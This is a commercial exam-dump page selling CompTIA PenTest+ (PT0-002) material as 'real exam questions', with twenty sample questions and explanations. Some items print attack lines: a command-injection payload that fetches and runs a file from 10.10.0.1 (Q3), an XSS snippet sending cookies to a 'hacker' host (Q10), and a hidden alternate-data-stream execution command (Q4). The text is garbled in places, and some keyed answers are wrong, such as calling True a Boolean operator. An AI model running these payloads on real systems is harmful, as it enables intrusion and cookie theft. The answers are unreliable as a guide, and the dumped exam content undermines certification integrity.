Our team of highly skilled and experienced professionals is dedicated to delivering up-to-date and precise study materials in PDF format to our customers. We deeply value both your time and financial investment, and we have spared no effort to provide you with the highest quality work. We ensure that our students consistently achieve a score of more than 95% in the CompTIA PT0-002 exam. You provide only authentic and reliable study material. Our team of professionals is always working very keenly to keep the material updated. Hence, they communicate to the students quickly if there is any change in the PT0-002 dumps file. The CompTIA PT0-002 exam question answers and PT0-002 dumps we offer are as genuine as studying the actual exam content.
24/7 Friendly Approach:
You can reach out to our agents at any time for guidance; we are available 24/7. Our agent will provide you information you need; you can ask them any questions you have. We are here to provide you with a complete study material file you need to pass your PT0-002 exam with extraordinary marks.
Quality Exam Dumps for CompTIA PT0-002:
Pass4surexams provide trusted study material. If you want to meet a sweeping success in your exam you must sign up for the complete preparation at Pass4surexams and we will provide you with such genuine material that will help you succeed with distinction. Our experts work tirelessly for our customers, ensuring a seamless journey to passing the CompTIA PT0-002 exam on the first attempt. We have already helped a lot of students to ace IT certification exams with our genuine PT0-002 Exam Question Answers. Don't wait and join us today to collect your favorite certification exam study material and get your dream job quickly.
90 Days Free Updates for CompTIA PT0-002 Exam Question Answers and Dumps:
Enroll with confidence at Pass4surexams, and not only will you access our comprehensive CompTIA PT0-002 exam question answers and dumps, but you will also benefit from a remarkable offer – 90 days of free updates. In the dynamic landscape of certification exams, our commitment to your success doesn't waver. If there are any changes or updates to the CompTIA PT0-002 exam content during the 90-day period, rest assured that our team will promptly notify you and provide the latest study materials, ensuring you are thoroughly prepared for success in your exam."
CompTIA PT0-002 Real Exam Questions:
Quality is the heart of our service that's why we offer our students real exam questions with 100% passing assurance in the first attempt. Our PT0-002 dumps PDF have been carved by the experienced experts exactly on the model of real exam question answers in which you are going to appear to get your certification.
CompTIA PT0-002 Sample Questions
Question # 1
A penetration tester has been hired to perform a physical penetration test to gain access toa secure room within a client’s building. Exterior reconnaissance identifies two entrances, aWiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance?c
A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng
Answer: C
Question # 2
Given the following script:while True:print ("Hello World")Which of the following describes True?
A. A while loop B. A conditional C. A Boolean operator D. An arithmetic operator
Answer: C Explanation: True is a Boolean operator in Python, which is an operator that returns eitherTrue or False values based on logical conditions. Boolean operators can be used inexpressions or statements that evaluate to True or False values, such as comparisons,assignments, or loops. In the code, True is used as the condition for a while loop, which isa loop that repeats a block of code as long as the condition is True. The code will print“Hello World” indefinitely because True will always be True and the loop will never end. Theother options are not valid descriptions of True.
Question # 3
A penetration tester was able to gain access to a system using an exploit. The following isa snippet of the code that was utilized:exploit = “POST ”exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} –c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”exploit += “HTTP/1.1”Which of the following commands should the penetration tester run post-engagement?
A. grep –v apache ~/.bash_history > ~/.bash_history B. rm –rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM “apache” /F
Answer: B Explanation:The exploit code is a command injection attack that uses a vulnerable CGI script to executearbitrary commands on the target system. The commands are:cd /tmp: change the current directory to /tmpwget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1 chmod 777 apache: change the permissions of the file to allow read, write, andexecute for everyone./apache: run the file as an executableThe file apache is most likely a malicious payload that gives the attacker remote access tothe system or performs some other malicious action. Therefore, the penetration testershould run the command rm -rf /tmp/apache post-engagement to remove the file and itstraces from the system. The other commands are not effective or relevant for this purpose.
Question # 4
A penetration tester has obtained shell access to a Windows host and wants to run aspecially crafted binary for later execution using the wmic.exe process call create function.Which of the following OS or filesystem mechanisms is MOST likely to support thisobjective?
A. Alternate data streams B. PowerShell modules C. MP4 steganography D. PsExec
Answer: A Explanation: Alternate data streams (ADS) are a feature of the NTFS file system thatallows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially craftedbinary for later execution. ADS can be created or accessed using various tools orcommands, such as the command prompt, PowerShell, or Sysinternals12. For example,the following command can create an ADS named secret.exe in a file named test.txt andrun it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe &wmic process call create "cmd.exe /c test.txt:secret.exe"
Question # 5
Which of the following is a regulatory compliance standard that focuses on user privacy byimplementing the right to be forgotten?
A. NIST SP 800-53 B. ISO 27001 C. GDPR
Answer: C Explanation: GDPR is a regulatory compliance standard that focuses on user privacy byimplementing the right to be forgotten. GDPR stands for General Data ProtectionRegulation, and it is a law that applies to the European Union and the United Kingdom.GDPR gives individuals the right to request their personal data be deleted by datacontrollers and processors under certain circumstances, such as when the data is nolonger necessary, when the consent is withdrawn, or when the data was unlawfullyprocessed. GDPR also imposes other obligations and rights related to data protection,such as data minimization, data portability, data breach notification, and consentmanagement. The other options are not regulatory compliance standards that focus onuser privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of securityand privacy controls for federal information systems and organizations in the United States.ISO 27001 is an international standard that specifies the requirements for an informationsecurity management system.
Question # 6
Penetration on an assessment for a client organization, a penetration tester noticesnumerous outdated software package versions were installed ...s-critical servers. Which ofthe following would best mitigate this issue?
A. Implementation of patching and change control programs B. Revision of client scripts used to perform system updates C. Remedial training for the client's systems administrators D. Refrainment from patching systems until quality assurance approves
Answer: A Explanation: The best way to mitigate this issue is to implement patching and changecontrol programs, which are processes that involve applying updates or fixes to softwarepackages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software packages to ensure consistency,compatibility, and security. Patching and change control programs can help prevent orreduce the risk of attacks that exploit outdated software package versions, which maycontain known or unknown vulnerabilities that can compromise the security or functionalityof the systems or servers. Patching and change control programs can be implemented byusing tools such as WSUS, which is a tool that can manage and distribute updates forWindows systems and applications1, or Git, which is a tool that can track and controlchanges to source code or files2. The other options are not valid ways to mitigate thisissue. Revision of client scripts used to perform system updates is not a sufficient way tomitigate this issue, as it may not address the root cause of why the software packageversions are outdated, such as lack of awareness, resources, or policies. Remedial trainingfor the client’s systems administrators is not a direct way to mitigate this issue, as it maynot result in immediate or effective actions to update the software package versions.Refrainment from patching systems until quality assurance approves is not a way tomitigate this issue, but rather a potential cause or barrier for why the software packageversions are outdated.
Question # 7
Which of the following OSSTM testing methodologies should be used to test under theworst conditions?
A. Tandem B. Reversal C. Semi-authorized D. Known environment
Answer: D Explanation: The OSSTM testing methodology that should be used to test under theworst conditions is known environment, which is a testing approach that assumes that thetester has full knowledge of the target system or network, such as its architecture,configuration, vulnerabilities, or defenses. A known environment testing can simulate aworst-case scenario, where an attacker has gained access to sensitive information orinsider knowledge about the target, and can exploit it to launch more sophisticated or targeted attacks. A known environment testing can also help identify the most critical orhigh-risk areas of the target, and provide recommendations for improving its securityposture. The other options are not OSSTM testing methodologies that should be used totest under the worst conditions. Tandem is a testing approach that involves two testersworking together on the same target, one as an attacker and one as a defender, tosimulate a realistic attack scenario and evaluate the effectiveness of the defensemechanisms. Reversal is a testing approach that involves switching roles between thetester and the client, where the tester acts as a defender and the client acts as an attacker,to assess the security awareness and skills of the client. Semi-authorized is a testingapproach that involves giving partial or limited authorization or access to the tester, such asa user account or a network segment, to simulate an attack scenario where an attacker hascompromised a legitimate user or device.
Question # 8
A client wants a security assessment company to perform a penetration test against its hotsite. The purpose of the test is to determine the effectiveness of the defenses that protectagainst disruptions to business continuity. Which of the following is the MOST importantaction to take before starting this type of assessment?
A. Ensure the client has signed the SOW. B. Verify the client has granted network access to the hot site. C. Determine if the failover environment relies on resources not owned by the client. D. Establish communication and escalation procedures with the client.
Answer: A Explanation:The statement of work (SOW) is a document that defines the scope, objectives,deliverables, and timeline of a penetration testing engagement. It is important to have theclient sign the SOW before starting the assessment to avoid any legal or contractualissues.
Question # 9
Which of the following factors would a penetration tester most likely consider when testingat a location?
A. Determine if visas are required. B. Ensure all testers can access all sites. C. Verify the tools being used are legal for use at all sites. D. Establish the time of the day when a test can occur.
Answer: D Explanation: One of the factors that a penetration tester would most likely consider whentesting at a location is to establish the time of day when a test can occur. This factor canaffect the scope, duration, and impact of the test, as well as the availability and response ofthe client and the testers. Testing at different times of day can have different advantagesand disadvantages, such as testing during business hours to simulate realistic scenariosand traffic patterns, or testing after hours to reduce disruption and interference. Testing atdifferent locations may also require adjusting for different time zones and daylight savingtimes. Establishing the time of day when a test can occur can help plan and coordinate thetest effectively and avoid confusion or conflict with the client or other parties involved in thetest. The other options are not factors that a penetration tester would most likely considerwhen testing at a location.
Question # 10
Given the following code: var+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SCvar+img=new+Image();img.src=”<a href="http://hacker/%20+%20document.cookie">http://hacker/%20+%20document.cookie</a>;</SC RIPT>Which of the following are the BEST methods to prevent against this type of attack?(Choose two.)
A. Web-application firewall B. Parameterized queries C. Output encoding D. Session tokens E. Input validation F. Base64 encoding
Answer: C,E Explanation: Encoding (commonly called “Output Encoding”) involves translating specialcharacters into some different but equivalent form that is no longer dangerous in the targetinterpreter, for example translating the < character into the < string when writing to anHTML page.Output encoding and input validation are two of the best methods to prevent against thistype of attack, which is known as cross-site scripting (XSS). Output encoding is a techniquethat converts user-supplied input into a safe format that prevents malicious scripts frombeing executed by browsers or applications. Input validation is a technique that checksuser-supplied input against a set of rules or filters that reject any invalid or malicious data.Web-application firewall is a device or software that monitors and blocks web traffic basedon predefined rules or signatures, but it may not catch all XSS attacks. Parameterizedqueries are a technique that separates user input from SQL statements to prevent SQLinjection attacks, but they do not prevent XSS attacks. Session tokens are values that areused to maintain state and identify users across web requests, but they do not prevent XSSattacks. Base64 encoding is a technique that converts binary data into ASCII characters fortransmission or storage purposes, but it does not prevent XSS attacks.
Question # 11
A penetration tester learned that when users request password resets, help desk analystschange users' passwords to 123change. The penetration tester decides to brute force aninternet-facing webmail to check which users are still using the temporary password. Thetester configures the brute-force tool to test usernames found on a text file and the... Whichof the following techniques is the penetration tester using?
A. Password brute force attack B. SQL injection C. Password spraying D. Kerberoasting
Answer: A Explanation: The penetration tester is using a password brute force attack, which is atype of password guessing attack that involves trying many possible combinations ofpasswords against a single username or account. A password brute force attack can beeffective when the password is known to be weak, simple, or predictable, such as a defaultor temporary password. In this case, the penetration tester knows that the help deskanalysts change users’ passwords to 123change when they request password resets, anddecides to brute force the webmail with this password and a list of usernames. A passwordbrute force attack can be done by using tools such as Hydra, which can performparallelized login attacks against various protocols and services1. The other options are nottechniques that the penetration tester is using. SQL injection is a type of attack that exploitsa vulnerability in a web application that allows an attacker to execute malicious SQLstatements on a database server. Password spraying is a type of password guessingattack that involves trying one or a few common passwords against many usernames oraccounts. Kerberoasting is a type of attack that exploits a vulnerability in the Kerberosauthentication protocol that allows an attacker to request and crack service tickets forservice accounts with weak passwords.
Question # 12
A penetration tester is exploring a client’s website. The tester performs a curl commandand obtains the following:* Connected to 10.2.11.144 (::1) port 80 (#0)> GET /readmine.html HTTP/1.1> Host: 10.2.11.144> User-Agent: curl/7.67.0> Accept: */*>* Mark bundle as not supporting multiuse< HTTP/1.1 200< Date: Tue, 02 Feb 2021 21:46:47 GMT< Server: Apache/2.4.41 (Debian)< Content-Length: 317< Content-Type: text/html; charset=iso-8859-1<<!DOCTYPE html><html lang=”en”><head> <meta name=”viewport” content=”width=device-width” /><meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” /><title>WordPress › ReadMe</title><link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” /></head>Which of the following tools would be BEST for the penetration tester to use to explore thissite further?
A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP
Answer: C Explanation: WPScan is a tool that can be used to scan WordPress sites forvulnerabilities, such as outdated plugins, themes, or core files, misconfigured settings,weak passwords, or user enumeration. The curl command reveals that the site is runningWordPress and has a readme.html file that may disclose the version number. Therefore,WPScan would be the best tool to use to explore this site further. Burp Suite is a tool thatcan be used to intercept and modify web requests and responses, but it does not specializein WordPress scanning. DirBuster is a tool that can be used to brute-force directories andfiles on web servers, but it does not exploit WordPress vulnerabilities. OWASP ZAP is atool that can be used to perform web application security testing, but it does not focus onWordPress scanning.Reference: https://tools.kali.org/web-applications/burpsuite
Question # 13
When accessing the URL http://192.168.0-1/validate/user.php, a penetration testerobtained the following output ..d index: eid in /apache/www/validate/user.php line 12 ..d index: uid in /apache/www/validate/user.php line 13 ..d index: pw in /apache/www/validate/user.php line 14 ..d index: acl in /apache/www/validate/user.php line 15
A. Lack of code signing B. Incorrect command syntax C. Insufficient error handling D. Insecure data transmission
Answer: C Explanation: The most probable cause for this output is insufficient error handling, whichis a coding flaw that occurs when a program does not handle errors or exceptions properlyor gracefully. Insufficient error handling can result in unwanted or unexpected behavior,such as crashes, hangs, or leaks. In this case, the output shows that the program isdisplaying warning messages that indicate undefined indexes in the user.php file. Thesemessages reveal the names of the variables and the file path that are used by the program,which can expose sensitive information or clues to an attacker. The program should haveimplemented error handling mechanisms, such as try-catch blocks, error logging, orsanitizing output, to prevent these messages from being displayed or to handle themappropriately. The other options are not plausible causes for this output. Lack of codesigning is a security flaw that occurs when a program does not have a digital signature thatverifies its authenticity and integrity. Incorrect command syntax is a user error that occurswhen a command is entered with wrong or missing parameters or options. Insecure datatransmission is a security flaw that occurs when data is sent over a network withoutencryption or protection.
Question # 14
A penetration tester wrote the following comment in the final report: "Eighty-five percent ofthe systems tested were found to be prone to unauthorized access from the internet."Which of the following audiences was this message intended?
A. Systems administrators B. C-suite executives C. Data privacy ombudsman D. Regulatory officials
Answer: B Explanation:The comment in the final report was intended for C-suite executives, which are senior-levelmanagers or leaders in an organization, such as the chief executive officer (CEO), chieffinancial officer (CFO), or chief information officer (CIO). C-suite executives are typicallyinterested in high-level summaries or overviews of the penetration test results, such as thepercentage of systems affected by a certain vulnerability or risk, the potential impact or costof a breach, or the recommended actions or priorities for remediation. C-suite executivesmay not have the technical background or expertise to understand detailed or technicalinformation about the penetration test, such as specific vulnerabilities, exploits, tools, ortechniques. The comment in the final report provides a high-level summary of thepenetration test result that is relevant and understandable for C-suite executives. The otheraudiences are not likely to be interested in this comment. Systems administrators aretechnical staff who are responsible for installing, configuring, maintaining, and securingsystems and networks. They would be more interested in detailed or technical informationabout the penetration test, such as specific vulnerabilities, exploits, tools, or techniques.Data privacy ombudsman is a person who acts as an independent mediator betweenindividuals and organizations regarding data privacy issues or complaints. They would bemore interested in information about how the penetration test complied with data privacylaws and regulations, such as GDPR or CCPA. Regulatory officials are authorities whoenforce compliance with laws and regulations related to a specific industry or sector, suchas finance, health care, or energy. They would be more interested in information about howthe penetration test complied with industry-specific standards and frameworks, such asPCI-DSS, HIPAA, or NERC-CIP.
Question # 15
A penetration tester runs a scan against a server and obtains the following output:21/tcp open ftp Microsoft ftpd| ftp-anon: Anonymous FTP login allowed (FTP code 230)| 03-12-20 09:23AM 331 index.aspx| ftp-syst:135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2012 Std3389/tcp open ssl/ms-wbt-server| rdp-ntlm-info:| Target Name: WEB3| NetBIOS_Computer_Name: WEB3| Product_Version: 6.3.9600|_ System_Time: 2021-01-15T11:32:06+00:008443/tcp open http Microsoft IIS httpd 8.5| http-methods:|_ Potentially risky methods: TRACE|_http-server-header: Microsoft-IIS/8.5|_http-title: IIS Windows ServerWhich of the following command sequences should the penetration tester try NEXT?
A. ftp 192.168.53.23 B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 –U guest C. ncrack –u Administrator –P 15worst_passwords.txt –p rdp 192.168.53.23 D. curl –X TRACE https://192.168.53.23:8443/index.aspx E. nmap –-script vuln –sV 192.168.53.23
Answer: A
Question # 16
In an unprotected network file repository, a penetration tester discovers a text filecontaining usernames and passwords in cleartext and a spreadsheet containing data for 50employees, including full names, roles, and serial numbers. The tester realizes some of thepasswords in the text file follow the format: <name- serial_number>. Which of the followingwould be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing. B. Recommend using a password manage/vault instead of text files to store passwordssecurely. C. Recommend configuring password complexity rules in all the systems and applications. D. Document the unprotected file repository as a finding in the penetration-testing report.
Answer: D
Question # 17
Company.com has hired a penetration tester to conduct a phishing test. The tester wants toset up a fake log-in page and harvest credentials when target employees click on links in aphishing email. Which of the following commands would best help the tester determinewhich cloud email provider the log-in page needs to mimic?
A. dig company.com MX B. whois company.com C. cur1 www.company.com D. dig company.com A
Answer: A Explanation: The dig command is a tool that can be used to query DNS servers andobtain information about domain names, such as IP addresses, mail servers, nameservers, or other records. The MX option specifies that the query is for mail exchangerecords, which are records that indicate the mail servers responsible for accepting emailmessages for a domain. Therefore, the command dig company.com MX would best helpthe tester determine which cloud email provider the log-in page needs to mimic by showingthe mail servers for company.com. For example, if the output shows something likecompany-com.mail.protection.outlook.com, then it means that company.com usesMicrosoft Outlook as its cloud email provider. The other commands are not as useful fordetermining the cloud email provider. The whois command is a tool that can be used toquery domain name registration information, such as the owner, registrar, or expirationdate of a domain. The curl command is a tool that can be used to transfer data from or to aserver using various protocols, such as HTTP, FTP, or SMTP. The dig command with the Aoption specifies that the query is for address records, which are records that map domainnames to IP addresses.
Question # 18
During a penetration test, a tester is in close proximity to a corporate mobile devicebelonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration testercan perform?
A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device.
Answer: B Explanation: Bluesnarfing is the unauthorized access of information from a wirelessdevice through a Bluetooth connection, often between phones, desktops, laptops, andPDAs. This allows access to calendars, contact lists, emails and text messages, and onsome phones, users can copy pictures and private videos.
Question # 19
A company recently moved its software development architecture from VMs to containers.The company has asked a penetration tester to determine if the new containers areconfigured correctly against a DDoS attack. Which of the following should a tester performfirst?
A. Test the strength of the encryption settings. B. Determine if security tokens are easily available. C. Perform a vulnerability check against the hypervisor. D. .Scan the containers for open ports.
Answer: D Explanation: The first step that a tester should perform to determine if the new containersare configured correctly against a DDoS attack is to scan the containers for open ports.Open ports are entry points for network communication and can expose services orapplications that may be vulnerable to DDoS attacks. Scanning the containers for openports can help the tester identify which services or applications are running on thecontainers, and which ones may need to be secured or disabled to prevent DDoS attacks.Scanning the containers for open ports can also help the tester discover any unauthorizedor malicious services or applications that may have been installed on the containers byprevious attackers or compromised containers. Scanning the containers for open ports canbe done by using tools such as Nmap, which can perform network scanning andenumeration by sending packets to hosts and analyzing their responses1. The otheroptions are not the first steps that a tester should perform to determine if the newcontainers are configured correctly against a DDoS attack. Testing the strength of theencryption settings is not relevant to DDoS attacks, as encryption does not prevent or mitigate DDoS attacks, but rather protects data confidentiality and integrity. Determining ifsecurity tokens are easily available is not relevant to DDoS attacks, as security tokens areused for authentication and authorization, not for preventing or mitigating DDoS attacks.Performing a vulnerability check against the hypervisor is not relevant to DDoS attacks, asthe hypervisor is not directly exposed to network traffic, but rather manages the virtualmachines or containers that run on it.
Question # 20
A penetration tester breaks into a company's office building and discovers the companydoes not have a shredding service. Which of the following attacks should the penetrationtester try next?
A. Dumpster diving B. Phishing C. Shoulder surfing D. Tailgating
Answer: A Explanation: The penetration tester should try dumpster diving next, which is an attackthat involves searching through trash bins or dumpsters for discarded documents or itemsthat may contain sensitive or useful information. Dumpster diving can reveal informationsuch as passwords, account numbers, credit card numbers, invoices, receipts, memos,contracts, or employee records. The penetration tester can use this information to gainaccess to systems or networks, impersonate users or employees, or perform socialengineering attacks. The other options are not likely attacks that the penetration testershould try next based on the discovery that the company does not have a shreddingservice. Phishing is an attack that involves sending fraudulent emails that appear to befrom legitimate sources to trick users into revealing their credentials or clicking on maliciouslinks or attachments. Shoulder surfing is an attack that involves observing or spying onusers while they enter their credentials or perform other tasks on their devices. Tailgating isan attack that involves following authorized personnel into a restricted area without properauthorization or identification.